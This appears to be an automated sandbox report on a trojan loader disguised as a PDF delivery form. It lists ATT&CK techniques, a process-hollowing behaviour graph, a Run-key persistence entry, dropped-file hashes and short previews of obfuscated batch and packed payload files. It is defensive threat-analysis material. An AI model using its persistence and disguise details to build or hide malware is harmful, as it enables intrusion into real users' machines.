                      Registry Run Keys / Startup Folder
                      2
                      Virtualization/Sandbox Evasion
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture113
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading
                      411
                      Process Injection
                      LSA Secrets1
                      System Network Connections Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Deobfuscate/Decode Files or Information
                      Cached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Obfuscated Files or Information
                      DCSync35
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578035 Sample: Delivery Confirmation Forms... Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 44 drive.usercontent.google.com 2->44 46 drive.google.com 2->46 56 Found malware configuration 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 12 other signatures 2->62 8 Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe 1 10 2->8         started        13 Cpbxcxnx.PIF 6 2->13         started        15 Cpbxcxnx.PIF 6 2->15         started        signatures3 process4 dnsIp5 48 drive.google.com 172.217.17.46, 443, 49709, 49710 GOOGLEUS United States 8->48 50 drive.usercontent.google.com 172.217.17.65, 443, 49712 GOOGLEUS United States 8->50 36 C:\Users\Public\Libraries\xnxcxbpC.pif, PE32 8->36 dropped 38 C:\Users\Public\Libraries\Cpbxcxnx.PIF, PE32 8->38 dropped 40 C:\Users\Public\Libraries\FX.cmd, DOS 8->40 dropped 42 2 other malicious files 8->42 dropped 64 Writes to foreign memory regions 8->64 66 Allocates memory in foreign processes 8->66 68 Sample uses process hollowing technique 8->68 17 xnxcxbpC.pif 8->17         started        20 cmd.exe 1 8->20         started        70 Antivirus detection for dropped file 13->70 72 Multi AV Scanner detection for dropped file 13->72 74 Machine Learning detection for dropped file 13->74 22 xnxcxbpC.pif 13->22         started        24 cmd.exe 13->24         started        76 Sample is not signed and drops a device driver 15->76 78 Allocates many large memory junks 15->78 26 xnxcxbpC.pif 15->26         started        28 cmd.exe 1 15->28         started        file6 signatures7 process8 signatures9 52 Detected unpacking (changes PE section rights) 17->52 54 Maps a DLL or memory area into another process 17->54 30 conhost.exe 20->30         started        32 conhost.exe 24->32         started        34 conhost.exe 28->34         started        process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe54%VirustotalBrowse
                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe58%ReversingLabsWin32.Trojan.ModiLoader
                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe100%AviraHEUR/AGEN.1326052
                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Cpbxcxnx.PIF100%AviraHEUR/AGEN.1326052
                      C:\Users\Public\Libraries\Cpbxcxnx.PIF100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Cpbxcxnx.PIF58%ReversingLabsWin32.Trojan.ModiLoader
                      C:\Users\Public\Libraries\xnxcxbpC.pif3%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.pmail.com00%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      drive.google.com
                      172.217.17.46
                      truefalse
                        high
                        drive.usercontent.google.com
                        172.217.17.65
                        truefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.usercontent.google.com/Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://sectigo.com/CPS0Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.sectigo.com0Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://ocsp.sectigo.com0CDelivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.pmail.com0Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.217.17.46
                                            drive.google.comUnited States
                                            15169GOOGLEUSfalse
                                            172.217.17.65
                                            drive.usercontent.google.comUnited States
                                            15169GOOGLEUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578035
                                            Start date and time:2024-12-19 07:56:59 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 48s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:19
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@21/7@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 69
                                            • Number of non-executed functions: 257
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            01:57:51API Interceptor2x Sleep call for process: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe modified
                                            01:58:13API Interceptor4x Sleep call for process: Cpbxcxnx.PIF modified
                                            01:58:38API Interceptor9x Sleep call for process: xnxcxbpC.pif modified
                                            07:58:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx C:\Users\Public\Cpbxcxnx.url
                                            07:58:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx C:\Users\Public\Cpbxcxnx.url
                                            No context
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e1469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            rK0CtrtVrl.exeGet hashmaliciousLummaC, StealcBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            NHEXQatKdE.exeGet hashmaliciousLummaCBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            CefJcYwgWs.exeGet hashmaliciousLummaC, StealcBrowse
                                            • 172.217.17.65
                                            • 172.217.17.46
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\Public\Libraries\xnxcxbpC.pifF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                  PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                    purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                      PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                        SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                          PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                            tTIYCp2sf4.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cpbxcxnx.PIF">), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):104
                                                                Entropy (8bit):5.089863219233713
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMBpTsbx2Zvol:HRYFVmTWDyzUTEx2Wl
                                                                MD5:A38CEDA2F3FC58DB1F5F0E68804755D0
                                                                SHA1:883C2DB76BE4E6937939FC9EE8CCCA6300FF8975
                                                                SHA-256:BB300AAE00663AB1266B5CD81AAD4E61B56E78157B5E5BE4F1F5A5DC40BFE3F9
                                                                SHA-512:393D97E2F175C48BF0156021B96D9DB0B3ADFDCEBEABE038707B70C507B011C2B2D3D1530605636809620F3CE21288DF97469C2C1630B8343784DA1498EDF655
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cpbxcxnx.PIF"..IconIndex=965829..HotKey=52..
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):15789
                                                                Entropy (8bit):4.658965888116939
                                                                Encrypted:false
                                                                SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                Malicious:false
                                                                Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):615395
                                                                Entropy (8bit):7.3853484120868185
                                                                Encrypted:false
                                                                SSDEEP:12288:7oyblf23a+m2mKdQw+w+h/tIISwIMn0h8OYRBl3VjUcSxxi1nHW8:7oyFgaSm4Qw6/tI/A0fYXvjUtxs1nZ
                                                                MD5:57636B438B4A5EAA59EF20CD03F828E6
                                                                SHA1:30518895F5ECA780C0E413CE3698C844E0571138
                                                                SHA-256:9D47DAF2B17AE1B1647B755975365D0FE9B81297F2DCD0A3C687FE010D44C020
                                                                SHA-512:7B36C85776C51CF16927E54C89B47E84220AE257D18C825F71DFE9EF85B0138B62323A6C7F23F3515A12FEA0B5F32B2EEEA63BF76497CA8307E8FA9291E48739
                                                                Malicious:true
                                                                Preview:...Y#..K........!'.......''%'."%....%........%....Y#..KN..%.%.%$.....Y#..Kfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun....rd\$>-YeE..w..1.[_..C..<......B..:.!0.g=...!.................P.m.`[..1J....g...%.p..)...N..;....].../v..._.8w...!.-E.\
                                                                Process:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1362944
                                                                Entropy (8bit):7.343935115196535
                                                                Encrypted:false
                                                                SSDEEP:24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhODqR:TtTiq973f
                                                                MD5:72AB2A99902EC6F67B0D4DF67820328E
                                                                SHA1:31477040C90AAB506547FE4E4450E71B76E9345B
                                                                SHA-256:406044BA7E007830321B3669505774B9E282502AC958F0CD723E5106C33C4180
                                                                SHA-512:3FF78C68E71F0BC2788F4177D7A49FF5857A71EC42D5E70C786F9CDEA3A4B8ED1563FE95BEEF7501C8B6C85E96E06B63F5E5399575163B50BB6404BDEC025CCE
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 58%
